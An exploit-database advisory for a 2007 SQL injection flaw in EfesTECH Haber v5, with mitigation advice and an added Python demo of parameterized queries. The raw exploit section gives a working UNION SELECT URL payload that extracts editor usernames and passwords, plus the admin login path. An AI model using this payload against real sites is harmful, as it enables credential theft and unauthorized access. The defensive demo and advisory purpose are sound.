Vendor: EfesTECH Haber
By: CyberGhost
CVSS: 5.5 (MEDIUM)
Remote SQL Injection
CWE: 89
Product Name: EfesTECH Haber
Affected Version From: 5
Affected Version To: 5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

EfesTECH Haber v5,0 Remote SQL Injection Vulnerability

The vulnerability allows an attacker to perform SQL injection by manipulating the 'id' parameter in the URL. By using a UNION SELECT statement, the attacker can retrieve sensitive information such as usernames and passwords from the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks.
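
An added example (not part of the original advisory or of the EfesTECH code) of the mitigation above, in Python with an in-memory SQLite database: the concatenated query stands in for the vulnerable pattern, and the hardened one validates `id` and binds it as a parameter. The `haber` table layout, the function names and the stored values are assumptions constructed for the demo; only `editorler`, `kulladi`, `sifre` and the request value come from the advisory.

```python
import re
import sqlite3

# Request value from the advisory, URL-decoded ('+' becomes a space).
ADVISORY_ID = "-1 union select 0,kulladi,2,3,sifre,5,6,7,8,9,0,1,2,3,4 from editorler"

def make_db():
    """Constructed lab schema: 'haber' (15 columns) is an assumed layout."""
    db = sqlite3.connect(":memory:")
    cols = ", ".join(f"c{i}" for i in range(1, 15))
    db.execute(f"CREATE TABLE haber (id INTEGER PRIMARY KEY, {cols})")
    db.execute("CREATE TABLE editorler (kulladi TEXT, sifre TEXT)")
    db.execute("INSERT INTO haber (id, c1, c4) VALUES (1, 'Headline', 'Body')")
    db.execute("INSERT INTO editorler VALUES ('editor1', 'constructed-secret')")
    return db

def get_article_vulnerable(db, raw_id):
    # 'Before' pattern: the request value becomes part of the SQL text.
    return db.execute("SELECT * FROM haber WHERE id=" + raw_id).fetchall()

def get_article_hardened(db, raw_id):
    # 1) Validate: an article id is a short run of ASCII digits, nothing else.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a non-negative integer")
    # 2) Bind: the value is passed as data and never parsed as SQL.
    return db.execute("SELECT * FROM haber WHERE id = ?", (int(raw_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", get_article_vulnerable(db, ADVISORY_ID))
    print("hardened, id=1:", get_article_hardened(db, "1"))
    try:
        get_article_hardened(db, ADVISORY_ID)
    except ValueError as exc:
        print("hardened, advisory value rejected:", exc)
```

Validation and binding are independent layers: binding alone already keeps the value out of the SQL text, and the digit check rejects malformed requests before they reach the database.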

Exploit-DB raw data:

#Title: EfesTECH Haber v5,0 Remote SQL Injection Vulnerability
#Author: CyberGhost
#Demo Page: http://www.haberguvercini.com
#Script Page: http://aspindir.com/indir.asp?id=4899&sIslem=%DDndir

#Vuln.

#Username - Password:/?efestech=haber&id=-1+union+select+0,kulladi,2,3,sifre,5,6,7,8,9,0,1,2,3,4+from+editorler
#Admin Login : /editor
====================================
Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR

And All TURKISH HACKERS !

# milw0rm.com [2007-05-14]